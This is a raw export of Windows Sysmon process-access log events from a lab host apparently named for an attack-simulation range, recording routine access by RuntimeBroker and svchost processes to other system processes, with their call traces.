13:58:35.476{59A5CD1D-93F9-6005-F104-00000000A301}45405952C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\execmodelclient.dll+f98a|C:\Windows\System32\execmodelclient.dll+f8ac|C:\Windows\System32\execmodelclient.dll+1e05b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000012164Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.476{59A5CD1D-93F9-6005-F104-00000000A301}45405956C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+e7c63|C:\Windows\System32\Windows.Storage.dll+e73d5|C:\Windows\System32\Windows.Storage.dll+e72e9|C:\Windows\System32\Windows.Storage.dll+e7282|C:\Windows\System32\Windows.Storage.dll+5b9fd|C:\Windows\System32\Windows.Storage.dll+ddfc6|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506 10341000x800000000000000012163Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.476{59A5CD1D-93F9-6005-F104-00000000A301}45405956C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+60513|C:\Windows\System32\Windows.Storage.dll+5bbcc|C:\Windows\System32\Windows.Storage.dll+5bb23|C:\Windows\System32\Windows.Storage.dll+5b99b|C:\Windows\System32\Windows.Storage.dll+ddfc6|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012162Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.476{59A5CD1D-93F9-6005-F104-00000000A301}45405956C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ceeb|C:\Windows\System32\Windows.Storage.dll+12ac55|C:\Windows\System32\Windows.Storage.dll+ddfa8|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012161Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.476{59A5CD1D-93F9-6005-F104-00000000A301}45405956C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+12ac29|C:\Windows\System32\Windows.Storage.dll+ddfa8|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c 10341000x800000000000000012160Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.476{59A5CD1D-93F9-6005-F104-00000000A301}45405952C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\execmodelclient.dll+8e62|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000012159Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.476{59A5CD1D-93F9-6005-F104-00000000A301}45405952C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\execmodelclient.dll+8d5e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000012158Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.476{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012157Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.476{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012156Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.476{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012155Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.461{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012154Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.461{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012153Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.461{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012152Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.461{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012151Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.461{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012150Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.461{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012149Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.461{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012148Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.461{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012147Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.461{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012146Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.461{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012145Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.461{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012144Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.445{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012143Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 